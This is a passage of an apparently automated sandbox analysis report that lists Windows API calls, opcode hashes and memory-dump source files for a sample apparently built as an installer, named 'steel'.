                                                                                            • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                            • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                            • API String ID: 667068680-2254406584
                                                                                            • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                            • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                            • API String ID: 190572456-212574377
                                                                                            • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                            • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                              • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                              • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                              • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                            • API String ID: 142928637-2676053874
                                                                                            • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                            • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                            • API String ID: 2238633743-1050967733
                                                                                            • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                            • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                            • API String ID: 667068680-222143506
                                                                                            • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                            • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B57E
                                                                                            • GetDC.USER32(?), ref: 0041B58A
                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2502006586-0
                                                                                            • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                            • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                            • API String ID: 1452528299-1580325520
                                                                                            • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                            • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                            • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                            • String ID:
                                                                                            • API String ID: 447804332-0
                                                                                            • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                            • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                            • LocalFree.KERNEL32(0056FAA8,00000000,00401B68), ref: 00401ACF
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0056FAA8,00000000,00401B68), ref: 00401AEE
                                                                                            • LocalFree.KERNEL32(00570AA8,?,00000000,00008000,0056FAA8,00000000,00401B68), ref: 00401B2D
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$Show
                                                                                            • String ID:
                                                                                            • API String ID: 3609083571-0
                                                                                            • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                            • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                            APIs
                                                                                              • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                            • String ID:
                                                                                            • API String ID: 3527656728-0
                                                                                            • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                            • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID: !nI$.tmp$_iu
                                                                                            • API String ID: 3498533004-584216493
                                                                                            • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                            • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                            • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                            • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                            APIs
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                            • API String ID: 3312786188-1660910688
                                                                                            • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                            • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                            • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                            • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                            • API String ID: 828529508-2866557904
                                                                                            • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                            • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                            • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                            • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                            APIs
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                            • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
